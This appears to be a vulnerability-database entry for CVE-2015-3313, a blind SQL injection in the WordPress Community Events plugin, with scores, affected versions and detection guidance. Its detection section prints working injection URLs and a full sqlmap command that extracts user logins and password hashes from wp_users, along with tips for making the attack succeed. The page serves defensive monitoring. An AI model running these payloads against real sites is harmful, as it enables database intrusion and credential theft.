cbcvebase.
CVE-2015-3313
published 2017-09-07

CVE-2015-3313: SQL injection vulnerability in WordPress Community Events plugin before 1.4.

PriorityP265critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
8.34%
94.3th percentile
SQL injection vulnerability in WordPress Community Events plugin before 1.4.

Affected

1 ranges
VendorProductVersion rangeFixed in
community_events_projectcommunity_events<= 1.3.5

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://www.site.com/?page_id=2&eventyear=2015 AND 1=1 )--&dateset=on&eventday=1
urlhttp://www.site.com/?page_id=2&eventyear=2015 AND 1=0 )--&dateset=on&eventday=1
commandsqlmap -u "http://www.site.com/?page_id=2&eventyear=2015&dateset=on&eventday=1" -p "eventyear" --technique=B --dbms=mysql --suffix=")--" --string="Test" --sql-query="select user_login,user_pass from wp_users"
  • Monitor HTTP requests targeting the `eventyear` GET parameter for SQL injection payloads, specifically patterns containing SQL boolean logic (e.g., `AND 1=1`, `AND 1=0`) and the `)--` suffix used to close and comment out the injected query.
  • The attack requires the `dateset=on` and `eventday=1` parameters to be present alongside the malicious `eventyear` value — use this combination as a detection correlation signal in WAF/IDS rules.
  • This is a blind Boolean-based SQL injection; detection should account for repeated near-identical requests differing only in the boolean condition (true vs. false), which is characteristic of blind SQLi enumeration.
  • The exploitation target is the Community Events plugin full schedule page; alert on requests to WordPress pages with `eventyear` parameter containing non-numeric characters or SQL keywords.
  • ·Exploitation requires at least one planned event to exist on the calendar; without an event, the true/false differentiation used in blind SQLi is not possible.
  • ·When using sqlmap, the `--string` parameter must contain part of the name of an existing event to allow sqlmap to differentiate between true and false SQL responses.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.